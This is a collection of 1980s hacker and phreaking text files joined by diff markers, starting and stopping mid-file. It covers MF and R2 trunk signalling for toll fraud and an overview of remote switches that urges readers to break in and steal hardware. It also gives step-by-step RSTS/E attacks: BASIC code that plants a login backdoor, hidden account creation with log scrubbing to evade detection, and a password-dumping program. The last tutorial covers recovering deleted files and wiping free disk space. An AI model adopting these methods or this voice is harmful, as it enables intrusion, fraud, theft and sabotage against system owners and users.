enough, you probably aren't on r1. A way to find out the timing is to send
2400/2600 starting with 200ms, then decreasing the timing with 1ms steps.
With 200ms, the trunk is likely to hang up when you send the hangup tone.
Find the timing that hangs up, but leaves you on the trunk (this can be heard
by a wink), then keep the 2400/2600 timing that way and adjust the delays
and the 2400 timing. Timings suggested for AT&T + MCI trunks are as follows:
2400/2600 delay 2400 delay [ms]
------------------------------------------
137 100 137 1200
100 100 100 100
140 400 140 1200
120 100 60 300
150 0 150 150
The delay before KP or KP2 is sent may/may not be important and must sometimes
be very accurate. this can be adjusted by ear. If the line hangs up before you
start dialing, then make the last delay shorter.
NOTE:Not all trunks work with the same timing, and sometimes when dialing
the same number you are routed another way. This is a problem, but if you have
a trained boxing-ear, you can learn to separate trunks from each other.
The KP2 is used for international dialing.
KP2-CC-0/1-NPA-PREF-SUF-ST
Where 0 = Connect by cable
1 = Connect by satellite
Thus, a call to the US via cable would appear like:
KP2-1-0-NPA-PREF-SUFF-ST
SOCOTEL
=======
This system is identical to R1, except for that the line signals are
out of band, and are hard to produce on the foneline.
Hangup is 3850 and is sent with 50ms pulses.
Dial timing is the same as is for r1 (50/50)
CCITT R2
--------
This is probably the most complicated signalling system (with the exception of
Common Channel Signalling systems) and offers a very wide range of
possibilities for phreaking. One of the problems with R2 is that it is more
or less based around PCM, and on such systems all the line signalling info
(the important tones such as seize and hangup) is sent over a different
timeslot (PCM uses a timesharing method for sending voice/signals) and
is then difficult to control. On some R2 systems the PCM method is not
implemented at all and this is the one I will discuss in detail. The
supervisory tone (3825Hz) can normally also be a mess to send over the lines.
There have been test numbers for telco personnel that connects to a trunk,
but this does not help much, since the seize signal must be sent before
dialing anyway and is, as I said before, a mess to get through.
.The R2 uses special signalling methods not seen elsewhere, e.g
there is a separate set of backward tones that the receiving CO sends back
between each digit. I have, merely for the sake of accuracy, included these.
The backward signals may seem unnecessary but there might be some room for
phreaking with them too. Another feature of R2 is that no specific timing
exists. Every digit should be sent until the receiving CO responds with
another Backward digit, which could in turn have some other meaning. A
specification for R2 is that it should handle 6/7 signals per second, this
is quite slow, though, and usually much faster speed can be acheived than
with for instance R1.
.On R2, register signals are two frequencies from a group of 6
separated by 120Hz. Line signals are all 3825Hz and vary in pulsing length.
Register signals are not only split in Backward/Forward groups, but also
in groups I/II on forw. signals and A/B on backward signals. Group I is
mainly normal dialing digits while group II signals are messages that specify
Subscriber types etc. I have tried to include as much as I know about the
messages, if anyone has got more info on this or anything else in this
phile, please contact me.
R2 Register signals
------------------------------------------------------------
Forward 1380 1500 1620 1740 1860 1980 [Hz]
------------------------------------------------------------
Backward 1140 1020 900 780 660 540 [Hz]
------------------------------------------------------------
Digit
1 x x
2 x x
3 x x
4 x x
5 x x
6 x x
7 x x
8 x x
9 x x
10 x x
11 x x
12 x x
13 x x
14 x x
15 x x
-----------------------------------------------------------
These are translated as:
-----------------------------------------------------------
Forward Signals
-----------------------------------------------------------
Digit Group I Group II
-----------------------------------------------------------
1 1 Normal subscriber
2 2 Priviledged subscriber
3 3 Test subscriber
4 4 Payfone
5 5 Operator
6 6 ?
7 7 Normal subscriber
8 8 ?
9 9 Priviledged subscriber
10 10 Operator
11 KP2E Forwarded call
12 KP2 Reserved
13 Reserved Reserved
14 Reserved Reserved
15 ST Reserved
----------------------------------------------------------
-----------------------------------------------------------------------------
Backward signals
-----------------------------------------------------------------------------
Digit Group A Group B
-----------------------------------------------------------------------------
1 Send next digit (x+1) Sub.vacant, call tracing (BAD)
2 Send previous digit (x-1) Send guide tone
3 Receive group B signals Subscriber busy
4 National net failure Net Failure
5 Specify subscriber type Disconnected number
6 Connect voicechannel Subscriber vacant - Sup
7 Send (x-2) Subscriber vacant - Non-Sup
8 Send (x-3) Subscriber malfunction
9 ? ?
10 Reserved The number has changed
-----------------------------------------------------------------------------
R2 Line signals, non-PCM (3825Hz)
---------------------------------------------------------------
Signal Direction Duration[ms]
---------------------------------------------------------------
Seizing --> 50 or 150
Seizing ACK (wink) <-- 50 (or longer)
Answer <-- 150
Metering (count) <-- 100
Clear back <-- 600
Clear Forward --> 1500
---------------------------------------------------------------
The backward signals are used to ask the calling CO questions while
dialing. This may cause problems since you may not know when to send
digits and when to send info, especially signals like send x-2 may
cause headaches. One way to find this out is usually by testing
different orders. Usually the subscriber type question is only sent when
making national calls and is asked after all the digits have been sent.
On intl. calls the subscriber type is asked after the CC (like on R1).
The thing is that the Telco knows these things and are trying their best to
make life hard for boxers by programming their equipment to send questions
at unexpected times.
A boxed call may take place as follows:
Dial number 555-1212
CO1 CO2
---------------------------
Clear Forward ->
Seize ->
<- Seizing ACK
I-5 ->
<-A-1 (send next digit)
I-5 ->
<-A-1
I-5 ->
<-A-1
I-1 ->
<-A-1
I-2 ->
<-A-1
I-1 ->
<-A-1
I-2 ->
<-A-5 or A-3 (specify subscriber)
II-5 -> (operator)
<-B-6 (no ST needed on local calls)
----------------------------
Any1 with more info on this, please contact me.
<End of File>
+185
View File
@@ -0,0 +1,185 @@
==)--- P TO PAUSE S TO STOP ---(==

/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/
A bit about modern Remote Switching. With new remote technology, when a T1
een the CO and the remote gets fried, the remote can go into an
emergency mode and keep going. A fitting analogy would be between a PC and
a mainframe. When hooked up with the mainframe (the CO), the PC(the remote)
emulates the mainframe, but when the link is broken, (ie: the T1 gets
blasted) it can operate independantly and intelligently. Well, the remotes
today are bringing about a more fully distribted network, and some even have
trunking capabilites. Another plus with remotes is that they cut down the
length of the subscriber loop and are more cost-effective in urban areas.
Some speculate the the increased use of remotes will change the way the network
is designed.
Another use of remotes is apparent in providing digital service to sparsely
populated areas. Alcatel's E10-FIVE advanced digital CO can now be made
availlable through Alcatel's RSU (remote Switching Units) and RLU (Remote
Line Unit. The E10-FIVE is already a fully distributed, microproscessor
controlled architectur CO, including the RSU and RLU capabilities.
It consists of three major systems, each with computer and memory resources.
The PORT SUBSYSTEM, with line, trunk, and service circuits, and remote
interfacese. The Port Subsystem assists in call processing by performing
real-time functions such as digit reception, signaling, and line
supervision.
The CENTRAL MATRIX SUBSYSTEM consists of four independent non-blocking
planes. It provides the inter-connectivity for all elements of the
Port Subsystem and communication channels between the Port Subsystem
and Control Subsystem.
The CONTROL SUBSYSTEM is at the heart of the E10-FIVE. It consists of
TCUs(Telephony Control Units) and PCUs(Periphreal Control Units),
Central Matrix Controllers withen the Central Matrix and with termingal
unit microprocessors in the Port Subsystem.
The PCUs provide the system interface to peripheral maintenance and
administrative hardware such as Input/Output man-maching terminals,
hard disk drives, tape units, alarm panels, etc.
The TCUs are typically used for call processing, administration, or
spare provessors. Each TCU loaded with call processing software
serves its own group of line, trunk, and service circuits via the
Central Matrix and is referred to as a Supergroup. In essence, each
Supergroup is a Central Office with itself, and the PCUs act as their
network maintenance and administration center.
Back to RSUs and RLUs, The Alcatel E10-FIVE RSU contains modules that are
identical to the host CO, are extensions of the host Supergroup. The RSU
is really a CO capable of handling up to 1600 subscribers. Its is connected
to the host CO by two to eight T1 lings. On the T1 Lings, there are two
clear 64 kilobit channels that use X.75 protocol for control, maitenance,
administration data, etc. Each RSU also has two TCUs, and dual
plane non-blocking Central Matrix, tone generator, and MF/DTMF service
circuits and digital trunks. The RSU is capable of handling trunks to an
exchange other that the host, which takes care of back hauling traffic
through the main CO. It (the RSU) processes calls locally and
maintains the same level of diagnostics and maintenance as the host system.
As new software is implemented into the host CO, they are automatically
downloaded to the RSU, this saves the cost of multiple updates to the
CO generics.
When all lings between the E10-FIVE and the RSU are down, RSU subscribes
retain all calling servieces except three-way calling and call forwarding.
The traffic which normally be sen to the host CO through the T1 links
would be lost. However, local intra-RSU traffic is maintained. This means
that if contact is lost with the host CO, the RSU can still handle calls
between subscribers that it sevices.
Memory is allocated in the TCU for storing alarm, traffic and other
relevant data for a period time after the ling failures.
The Remote Line Unit(RSU) is a scaled down version of the RSU (to
put it simply). It is a remote subscriber concentrator and can serve
up to 400 lines. It contains software (not wares you idiot!) identical
to the E10-FIVE main unit and RSU, both of which can act as a host to an
RLU. It is connected to the host through two to four T1 links.
Like the RSU, the number of links between the RLU and the host is based
on traffic requirements. Unlike the RSU, the RLU requires two voice
channels for each intra-RLU call. Two clear 64-kilobit channels are also
utilized on these links for control, maintenance, and administration data.
Basically the E-10FIVE is a perfect example of the importance of
how remotes can modernize the network. I'd also like to take a look at
other manufacturers of computerized "distributed" architecture.(you'll
have to wait just a little while longer for the 'k-k00l' stuff)
One vendor, Stromberg-Carlson, has past history of serviceing rural areas.
S-C has an impressive lineup of remote switching equpment. Starting with the
90-line Remote Line Group, moving through the 1,080-line Remote Line Switch
and topping off with the 8,000 line Remote Network Switch. Stromberg's
remotes supply all of the host system DCO (Digital Central Office) features.
Strombergis putting the finishing touches on its DCO product line. The
Remote Line Switch(RLS) was introduced in 1982, and the Remote Line Group
(RLG), in early 1986. The top of the line Remote Network Switch(RNS), is
only now becoming available.
In the area of survability, the RNS maintains all features of the host,
even if the link is severed. The RLS, will lose most features except
POTS, coin DTMF, and mult-line hunt features. The RLG loses all
features as it has no switching capability of its own, and is just a
line concentrator.
The RNS can switch calls directly to the public network without
sending traffic through the host switch. The call handling capacity
of the host is conserved, and is an important step toward a truly
distributed network. In the S-C DCO environment, each switch acts
as a "host" for each of the smaller switches. For instance, a 1000-line
RLS, can be connected to the RNS and another 80-line RLG can then be
dropped offf the RLS. In these instances, the capacity of the host is
diminished. ie: The RNS may only handle 8,000 lines, whether the
lines are direct subscriber or served from smaller remote switches
or line groups.
All the S-C remotes support T1 interfacing. In addition, the Remote
Line Switch will support an interface to fiber-optic trunking.
The Stromberg remotes all support remote diganostic, outside plant testing,
and AMA/traffic data collection. Stromberg has three main reasons why
its DCO central offices along with the remotes are good purchases for
telecos: They cut costs by making the switch more efficient, increase
the flexability of the network, and help reduce the length of the
subscriber loop in preparation for ISDN and other adavanced services.
Northern Telecom's remotes extend full capability of the Dynamic Network
Architecture beyond the immediate area of the host switch with a family
of five remotes: the Remote Switching Center(RSC), the Extended Remote
RSC), the Remote Line Concentrating Module(RLCM), the Outside Plant
Module(OPN), and the new Large Business Remote(LBR).
The Remote Line Concentrating Module is connected to a host Line Group
Controller(LGC), or to a Remote Switching Center(RSC), through mazimum of
sic DS-1 links. It can terminate up to 640 lines, ie: 10 line drawers of
64 lines each. Maximum traffic capacity at six host links is approximately
4,700 CCS. The unit may be placed up to 100 miles away from the host office
at 0db loss.
The Outside Plant Module is an RLCM repackaged into an environmentally
controlled cabinet. The cabinet includes environmental controls, cross-
connect field, power, and battery backup.
The Remote Switching Center consists of up to 9 LCMs that are located at
a remote site and controlled by a Remote Cluster Controller (RCC), which
is an LGC based DMS-100 peripheral. The RCC connected back to its host
DMS-100 through 2 to 16 DS-1 links.
The total max. capacity is 5,760 lines (9 x 640). Traffic capacity
of the RSC is approximately 15,000 CCS, ie: 5,000 lines at 3 CCS/line or
2,000 lines 7.5 CCS/line.(you following me so far?)
All line features of the host LCM and the RLCM are supported by the RSC,
including POTS and IBN stations, attendant consoles, IBN business sets,
Datapath, etc.
The Extended Remote Switching Center is a form of the RSC to provide
a remote larger that a single RSC. Junctors will interconnect the control
sides (C-sides) of the RSCs, where 16 24-channel C-side ports are
available on each RSC for the junctors and/or host links. This will result
in a single large traffic group that provides trunking efficiencies between
the host and remote.
There are many benefits to the XRSC including, larger RSC configurations,
periperal ports, etc, etc, etc...
Ok, There are also Siemens, GTE, AT&T, etc remotes, but I just realised
it would take me another 80 sectors to cover them all, so I for now I will
stop. The remaining specs will be released in a suplemment...
The Benefits of playing with remotes:
Well, if your area is serviced by a remote, you actually have an unguarded,
mini-switching station to play with. Usually they will be locked up, so it
will require some bashing, but it's well worth it. I recomend either
taking interfaces, large portions of the remote, or the whole damn thing!
There will also surely be manuals and equipment sitting around for you...
later
======------======------======------======------======------=======------======
NOTE:
We are currently looking for the author of Tap.Interviews II, this file was
completely unauthorized by us and filled with lies. Obviously the author
was extremely mis-informed. We don't wish to 'get revenge', but we'd like
to know what kind of demented mentality would do this.
ALSO:
CEO is now looking for people to put up Elite CEO boards. We plan to set up
a network of CEO boards (you don't have to be in CEO). If you're
intrested, please leave mail to "Executive Hacker" on Draco Tavern
(707-745-5805). Full Validation is Automatic so we are using it as a mail
drop.
The First CEO Board will be "The Providence" at 505-294-8466, details
are still being worked out.
DOWNLOADED FROM P-80 SYSTEMS......
+218
View File
@@ -0,0 +1,218 @@
ShadowSpawn BBS Presents...
-------------------------------------------------------------------------------
INSIDE RSTS/E VOLUME III
-------------------------
BY: THE MARAUDER
THE COUNCIL OF THE FEDERATION
The information in this document is intended for informational purposes only
COPYRIGHT (C) - SEPTEMBER 13, 1985, ZONE COMMUNICATIONS
-------------------------------------------------------------------------------
This tutorial will deal with a subject many talk about, but few have
actually accomplished, installing a true back door into an operating system.
I will assume you have managed to get a privleged account on a RSTS/E
system, and have a working knowledge of the basic system commands, and are
somewhat familiar with a RSTS/E based text editor, such as TECO, or EDT.
This procedure should work on all versions of RSTS/E between V6.0-00, And
V8.5-00.
1) GETTING STARTED.
Before you actually attempt to install the patches, you need to know a
few things first.. Do the following "test's"..
A) before you are logged in, type any charachter followed by a <c/r>
the system will do 1 of two things, it will either respond with a
'Please say HELLO', or you will get the system header and the login
prompt, make a note of which..
B) before you are logged in, type 'HELLO', or 'LOGIN' followed by a <c/r>
The system will respond with one of two possible system headers..
INTELL CORP.. RSTS/E V7.0-01 KB7: <DIALUP> 20-MAR-85 10:47: PM
#
OR
INTELL CORP.. RSTS/E V7.0-01 KB7: <DIALUP> 20-MAR-85 10:47 PM
User:
Make a note of which login prompt you get, either a '#', or 'User: '.
You'll need this when installing the patches..
2) FINDING LOGIN.
Once you have made the above tests, log into your privleged account
and now you must find the basic source code for the rsts/e login program
which is 'login.Bas', or on some systems 'login.B2s'. I have generally
found most basic source files located in either '(1,200)', or 'DB1:(1,200)'
so look there first. If you don't find a copy in either of those accounts
then do a 'dir (*,*)login.*', Or a 'dir db1:(*,*)login.*'. If neither of these
directory lookups show up with 'login.Bas' then you either have to upload
your own copy (incidentally, all rsts/e source files are ascii.). Or you're
out of luck.. (But don't panic, most systems do keep a copy of their basic
programs on-line).. Note: if there are more than two drives (db1, db2), you
should search these also.. (Ie. Db3:, db4:, etc..).
3) INSTALLING THE 'BACKDOOR' ITSELF.
Once you have found a copy of login.Bas, move it into your account
with pip, (ie. PIP LOGIN.BAS=(*,*)LOGIN.BAS, where (*,*) = the account it's
currently in.). If you have uploaded it then skip that step..
Now you must use one of the systems text editors to install the patches
I preffer TECO. So here you do your 'TECO LOGIN.BAS' and you're ready to
go..
First of all, you must decide on a password that you would like to use
I usually like to use passwords that 'include' the special charachters not
allowed in normal rsts/e passwords, (ie. #,%,&,*,!). Once you have decided
on the password you'd like (make it a good one, cause it will be permanent).
You are ready to start the 'patching'..
Follow the next steps exactly, and type everything exactly as I have it.
(I will be using '%%ZONE' as my 'BACKDOOR' password..)
A) INSERT A LINE #110, HERE PUT IN 'BD$ = "WHATEVER PASSWORD YOU CHOSE"
IE. 110 BD$ = "%%ZONE"
B) at line 12000, count down to the 12th statement for that line.
It should look something like:
/ WAIT 30 UNLESS A%
/ INPUT LINE #1%, P$
/ P$=CVT$$(P$,1%+4%+8%+16+32%+128%+256%)
Directly after the line that reads '/INPUT LINE #1%,P$', you will insert the
following line.
/ GOTO 12011 IF LEFT(CVT$$(P$,-1%),LEN(BD$)) = BD$
So now it should read..
/ INPUT LINE #1%, P$
/ GOTO 12011 IF LEFT(CVT$$(P$,-1%),LEN(BD$))=BD$
/ P$ = CVT$$(P$,1%+4%+8%+16%+32%+128%+256%)
C) now insert a line 12011, and type it EXACTLY as follows.
12011 I$=SYS(PRIV.ON$)
/ I$=SYS(CHR$(2%))
/ PRINT
/ INPUT "ACCOUNT #";PROJ%,PROG%
/ DIM M1%(30%)
/ M1%(X%)=0% FOR X% = 1% TO 30%
/ M1%(0%) = 9%
/ M1%(1%) = 6%
/ M1%(2%) = 14%
/ M1%(7%) = PROG%
/ M1%(8%) = PROJ%
/ CHANGE M1% TO M$
/ T$ = SYS(M$)
/ PS$ = MID(T$,9%,4%)
/ M$ = CHR$(6%)+CHR$(4%)+STRING$(2%,0%)+CHR$(PROG%)+CHR$(PROJ%)+PS$
/ I$ = SYS(M$)
/ I$ = SYS(CHR$(9%))
/ GOTO 32767
(The previous line of code is what actually does the password lookup, and
the login, bypassing login's normal security procedure, for those who care.)
D) Now, here's where you use the information you got in step 1,
1) LIST LINE 32600
If the system you are patchng gave you the login prompt when you hit
Any charachter followed by a <c/r> before you were logged in, and line
32600 Reads.
32600 Q$=CHR$(9%)
/ PRINT FNC$;"PLEASE SAY HELLO"
/ TIMEOUT% = 17%
Insert the following statement.
32600 Q$=CHR$(9%)
/ GOTO 200 <---- INSERT THIS STATEMENT
/ PRINT FNC$;"PLEASE SAY HELLO"
/ TIMEOUT% = 17%
If the system printed 'Please say HELLO', upon entering any charachter
before being logged in, -DO NOT- change this line.
2) List line 11000, the second statement should be one of the following
/ PRINT FNC$;"USER: "; OR / PRINT FNC$;"#";
If the login prompt you got in step 1 was "#", then change that statement
To read '/ PRINT FNC$;"#"' (if it dosn't already read that way)
If you got a "User: " prompt in step #1, then change that statement to read
'/ PRINT FNC$;"User: "' (** note the space after the ':')
Now, save the program and exit out of the text editor, once you are in basic
do the following..
(I will assume we saved the file under the name: "LOGIN1.BAS")
1) TYPE "OLD LOGIN1.BAS"
If you made any syntax errors, here's where they will show up. If you
have any errors, go back and correct them with the text editor..
2) Once you have succesfully loaded the program into basic (using 'old'), type
'COMPILE', followed by a <c/r>. This will compile the program into machine
Language, and automatically save a copy in your account under the extension
'.BAC', so if I had loaded 'LOGIN1.BAS' (ie. OLD LOGIN1.BAS'), into memory
and typed 'COMPILE', I would now have a compiled copy in my account under the
name 'login1.Bac' (.Bac = basic compiled, by the way).
E) SWAPPING THE PROGRAMS..
Once you have succesfully gotten this far, the last step is to swap your
'doctored' copy of login, with the systems copy of login, you do this simply
by typing: "PIP (1,2)LOGIN.* = LOGIN1.BAC" (assuming you are in the same
account that your copy of 'login1.Bac' is in.. Now the patch is complete
download a copy of your 'patched' basic source, for use on other systems you
may run across.., And then delete all copies of it.. (Except the one you pipped
to account (1,2), of course.)
F) USING THE 'BACKDOOR'
To use the backdoor, you simply enter any 'valid' account on the system
when it asks 'user: ', or print's a "#", waiting for your account #, then when
it asks for a password you type in your 'backdoor' password, and login will
print 'enter account #', here type in whichever account you would like to get
into (ie, 1,2 - 1,3 - 1,4 - etc...) And you will be automatically logged into
that account, it should rememble something like this..
(STARTING LOGGED OUT OF COURSE..)
HELLO
INTELL CORP.. RSTS/E V7.9 KB17: <DIALUP> JOB 6 20-JUN-85 10:46 PM
USER: 1,2 <C/R> (1,2 IS ENTERED BY YOU)
PASSWORD: %%ZONE <C/R> (%%ZONE IS ENTERED BY YOU, AND WON'T ECHO)
ACCOUNT # 1,2 <C/R> (1,2 IS ENTERED BY YOU)
NOW YOU WILL GET THE 'READY' PROMPT, AND BE LOGGED INTO ACCOUNT 1,2..
Now you have full acess to the system no matter what they change any password
to, and for as long as they remain using any version of RSTS/E under V9.0..
So until next time..
Dial with care.......
THE
MARAUDER
COUNCIL OF THE FEDERATION
-------------------------------------------------------------------------------
+248
View File
@@ -0,0 +1,248 @@
ShadowSpawn BBS Presents..
-------------------------------------------------------------------------------
INSIDE RSTS/E VOLUME IV
------------------------
By: The Marauder
The Legion of Hackers !
The information in this document is intended for informational purposes only
Written - December 11, 1984. Zone communications, LOH
-------------------------------------------------------------------------------
In this document, I will describe how to create, delete, and edit
accounts, and how to modify the System Account file to help escape detection
I will assume for the most part, that you have read my earlier files on RSTS/E
and/or have a working knowledge of the RSTS/E Runtime System.
1) CREATING ACCOUNTS.
On all versions of RSTS/E lower than V9, the system manager uses a program
called 'REACT', to create new accounts, and to remove old ones. REACT resides
normally in the system library account (1,2), under the name 'REACT.BAC', or
'REACT.TSK', depending on who installed the system.
If you don't find it in (1,2), do a 'DIR(*,*)REACT.*', And find out where
It's been moved to.
To run the program, you must have privleges, (run it from a (1,*) account).
Usage of the program is as follows: (from 'Ready')
RUN $REACT
REACT V7.2-04 RSTS V7.2-04 LOD/H TIMESHARING
SYSTEM ACCOUNT MANAGER
FUNCTION? E
PROJ,PROG? 1,233
DISK:PASSWORD? LOH
QUOTA? 0
CLUSTER SIZE? 16
ACCOUNT NAME? LOH USERS
PROJ,PROG? ^Z
READY
DESCRIPTION OF OPTIONS:
Function? - This is where you specify whether you are deleting, or creating an
account it can be one of two choices:
1) E= E)NTER/CREATE an Account.
2) D = D)elete an account.
NOTE: When deleting an account, the account must be completely empty
(use 'PIP (P,PN)/ZE), Otherwise the error message
'?Account in use..' Will result.
Proj,Prog? This is where you enter the Project-Programmer number of the
account, you wish to create (or delete), it must be two numbers
between 1, and 255 (inclusivley), seperated by a comma.
(Ie. 1,33 - 50,50 - 2,20 - Etc..)
If you are deleting an account, it should be the PPN of the
account you wish to delete.
Password? This is where you enter the password you want assigned to tha
account, enter the password in the format: "XXXXXX"
where "XXXXXX" = 1 to 6 upper case letters, or numbers, or
a combination of both.. (Ie. LOD1, 1234, A1B2C, etc..)
NOTE: Some versions of REACT will respond with 'Disk:password?', Allowing
you to specify which disk you want the account to be created on, and
it's password. In either case, just enter the password, and ignore
the disk qualifier, since you can only log into accounts that reside
on the system (SY:) disk, it's for the most part useless to create an
Account on say 'DB1:', unless you wish to use it for storage purposes
only. If you have reason to create an account on any other disk than
the system disk, you would use the format:
"Disk:password? DB1:PASSWD". To access this account, you will either
Have to be in a privleged account (thus allowing you access to any
other account on the system, or be logged into a 'mirror' account
on the system disk, for example, say you created an account
DB1:(40,40), to acess this, would have to be logged into account
SY:(40,40), to modify anything in the account DB1:(40,40).
In any case, if you recieve the 'Disk:password? Prompt, and wish
to create an account on the system disk, (one that you can actually
log into, just enter the password you have selected.
Quota? This is where you set the maximum size of disk space (in blocks)
That the account can have. It can be from 0 to 32767, (inclusivly).
Selecting a Quota size of '0' (zero), gives the account unlimited
space.
Cluster size? This must match the clustersize of the system disk, it
can be 4,8, or 16, (16 being the most common), you can
find the system clustersize by using the 'SYSTAT' command, or
if that is unavailable, use trial and error, if the clustersize
you enter at this point does not correspond with the system
cluster size, an error message will result, so just try
tne next size up until it matches.
Account name? This is a symbolic 'Account name', that is basically not
used anywhere except in the file '$ACCT.SYS' (which will be
discussed in detail later), you can give it any name you
want, for the above example I used the name 'LOD USERS', in
reality I would probably just hit <c/r> at this question,
thus giving it no name.
If the above questions were answered with valid responses, REACT would now
create the specified account (1-6 seconds, depending on the system performance)
And a description of the account (PPN, Disk, Password, etc.. ), Will be
entered into the file '$ACCT.SYS'.
NOTE: When using the 'D - Delete' command, you will be asked only the following
FUNCTION? D
PROJ,PROG? 30,30
DISK? SY:
'D' being the 'DELETE' specification, "30,30" being the account you wish
to delete, and "SY:" being the disk that account (30,30) currently
exists on. If the account was empty, REACT would remove this account.
(Although refrence to the account, will still exist in the file '$ACCT.SYS')
In both cases (after the account has been Created, or Deleted), REACT will
return to: "Proj,Prog?", If you have additional accounts to Create, or
Delete, you can enter them now, if you are done, hit "^Z" (control Z)
to exit.
2) DESCRIPTION OF THE SYSTEM ACCOUNT FILE ($ACCT.SYS).
The file '(1,2)ACCT.SYS', is the System Account file. It is a
file that contains descriptions of the accounts that are on the system, such
as the Account Name, it's Password, etc.. Contrary to popular beleif, it is
-NOT- where RSTS/E looks to find the Password & other information, when a
Person is logging in. It is simply a symbolic file, used by the System
Manager to help keep track of what accounts are being used. It is a standard
ASCII file, that is opened in 'APPEND' mode when REACT is used to create
a file. It is quite useful for obtaining other accounts, especially if
you are a Non-Privleged user, and have found a program on the system that
will allow you to dump files anywhere (such as some versions of $RPGDMP.TSK)
You would simply dump this file, it should look something like this:
1, 1,SY:DEMO ,0,16,SYSM
0, 1,SY:SYSPAK,0,16
1, 2,SY:DEMO ,0,16,SYSTEM LIBRARY
1, 3,SY:AUXLIB,0,16,AUXILLIARY LIBRARY
30,10,DB1:TEMP ,0,16,TEMPORARY STORAGE
50,10,SY:KEVIN ,1000,16,KEVIN'S ACCOUNT
ETC..
Column 1 - is the account # (PPN)
2 - the disk the account resides on, and the account's password.
3 - Is the the accounts Quota (see above)
4 - the accounts Clustersize.
5 - The account's Symbolic name.
1, 1 - Tells you that this is the description of account (1,1).
SY:DEMO - tells you that the password to account (1,1) is 'DEMO', and that it
resides on the system (SY:) disk, thus you can actually log into
it.
0 - Say's that the the Quota for account (1,1) is '0' (unlimited)
16 - The Clustersize for account (1,1) is 16.
SYSM - is the symbolic name for account (1,1), this is the only place I
have actually seen the 'Symbolic Name' actually refrenced to. It has
no other use than to help the System Manager determine what purpose
the account serves (while looking through $ACCT.SYS), it is most often
used in school systems, where the Student's name, who is the owner of
said account, would be used for it's symbolic name.
MISC NOTES ABOUT REACT & $ACCT.SYS -
As I said above, every time an account is created using 'REACT', an
entry is made into $ACCT.SYS. When an account is deleted though, REACT
-DOES NOT- Remove the entry from ACCT.SYS, so if you were to make 10 accounts
then remove them, refrence to them would STILL exist in ACCT.SYS, Which would
Immediatly raise the suspicion of even the most naieve System Manager next time
He took a look into ACCT.SYS. Fortunatly the file $ACCT.SYS, is a standard
ASCII file, so you can use any text editor available on the system to actually
Remove the entries in it. Simply 'TECO $ACCT.SYS', and search for the
account's and delete the entire line.
NOTE 1 - I would also advise editing $ACCT.SYS, after you create -ANY- account
(Ones that you wish to be permanent), this makes your account a little
less obvious, and unless a System Manager either sees you on the system
or happens to do a "DIR (*,*)" and by luck notices it. He will not find
refrence to it in $ACCT.SYS.
NOTE 2 - The information in $ACCT.SYS is NOT alway's 100% accurate, for example
if the password to an account is changed (with UTILTY, or a custom
program - to be discussed in a future volume), this DOES NOT update
the information in $ACCT.SYS. This is especially common in schools
Where the students are assigned a standard password, and encouraged to
change it as soon as possible. Fortunatly though, the privleged
accounts's are not changed as often, and you can usually come up with
at the worst, one privleged account/password, and use the program
"(1,2)MONEY", or a small user written program to find every password
on the System.
Here is a small program that will display the password for any account, given
The PPN (accout number). It does of course, require privleges to run.
1 ! LOGPAS - V1.0-00
2 ! AUTHOR - THE MARAUDER
3 ! COPYRIGHT (C) - 1985,86,87 - LOH COMMUNICATIONS.
4 !
5 EXTEND
10 ON ERROR GOTO 500
20 DIM M%(30%) : DIM T%(30%)
30 INPUT 'ACCOUNT NUMBER (P,PN) ';PROJ%,PROG%
40 M%(I%)=0% FOR I% = 1% TO 30%
45 T%(I%)=0% FOR I% = 1% TO 30%
50 M%(0%) = 9%
55 M%(1%) = 6%
60 M%(2%) = 14%
65 M%(7%) = PROG%
79 M%(8%) = PROJ%
80 CHANGE M% TO M$
85 T$ = SYS(M$)
90 CHANGE T$ TO T%
95 PSW$ = RAD$(T%(9%)+SWAP%((T%(10%)))+RAD$(T%(11%)+SWAP%(T%(12%)))
100 PRINT 'PASSWORD = ';PSW$
110 GOTO 30
500 PRINT 'INVALID ACCOUNT NUMBER - ';PROJ;',';PROG
32766 NO EXTEND
32767 END
To use this program, simply type it in at the RSTS/E BASIC parser
(at 'Ready'), or upload (as an ASCII file, the above program, directly
to the RSTS/E BASIC parser. And type 'RUN', it will ask you for an account
(PROJ,PROG?), enter the account you want the password for, and it will be
printed out. Use ^C (control C) to exit from the program.
That's about it for this issue, until the next volume, Dial with care...
The
Marauder
-------------------------------------------------------------------------------
This Document, is the property of the Legion of Hackers as a whole. Sysops
are free to use it, as long as nothing is changed. Any questions, comments, or
corrections, can be made directly to me, at my BBS, The Twilight Zone, or to
any member of the Legion of Hackers.
===============================================================================
+241
View File
@@ -0,0 +1,241 @@
:-----------------------------------------------------------:
: :
: M A K I N G T H E M O S T O F :
: R S T S / E S Y S T E M S :
: ====================================== :
: :
: Written by : Captain Hack :
: : of Melbourne, :
: : Australia. :
: Written on : 01-Feb-86. :
: File No. : V01A-01 :
: :
:-----------------------------------------------------------:
Originally Displayed in the U.S. on:
P-80 Int'l Information Systems
INTRODUCTION.
This file is a tutorial on making the the most of a
RSTS/E system, making the most could mean anything from
making the system do so neat tricks, to using it to you
advantage, to taking it over completely; depending on your
needs!
For most of the examples you will need an account,
obviously non-privilaged, else you would not be reading this
tutorial. Bear in mind that most, if not all, of the
techniques described can be changed by the sysop. I found
this out while trying them, but most sysop's don't realize
everythings full potential and how it will be used; needless
to say that I most likely have missed out on things. Anyway I
hope you like the tutorial and you have an educational
experience! I will rely on also using your imagination and
ingenuity, as this is often needed.
OBTAINING OLD FILES.
If ever you have a valuble file that you don't want
people to see the contents of for one reason or another,
always write other information (random of fixed) over the
entire file before deleting it. When the system creates a
file it likes to have it continuous if possible, which means
many blocks will be consecutive. When a file is created the
system alters information in a system file indicting that a
particular block or set of blocks have been allocated so as
they will not be over-written. The directory knows which
which blocks are associated with which file, but when you
delete a file, the system flags the used blocks as available
and delete the directory entry. The system doesn't wipe the
information.
To dig up these old blocks, write yourself a program to
open a large file, I will leave the size up to you. You use
the filesize option in the OPEN statement to do this, then
just read in the blocks. When possible use block I/O for file
manipulation because of its speed and convienience. Look
through the blocks any if one if worth keeping save if to
another file.
-2-
Seeing as BASIC programs have line numbers, as long as you
find all the blocks, file reconstruction is easy.
There of course is no guarantee that you will find them
all. Some may have been reallocated, but it's amazing what
you can find! The bigger the block cluster size used in files
the easier it is to reconstruct them. Just experiment!
ANNOYING THE USERS.
A way to annoy the users of the system is a techinque
discovered just after we found out about the block recovery.
After finding remnants of some of my data strewn across the
system I decided the best thing to do was to zero all the
available disk space. One Sunday night we wrote a program to
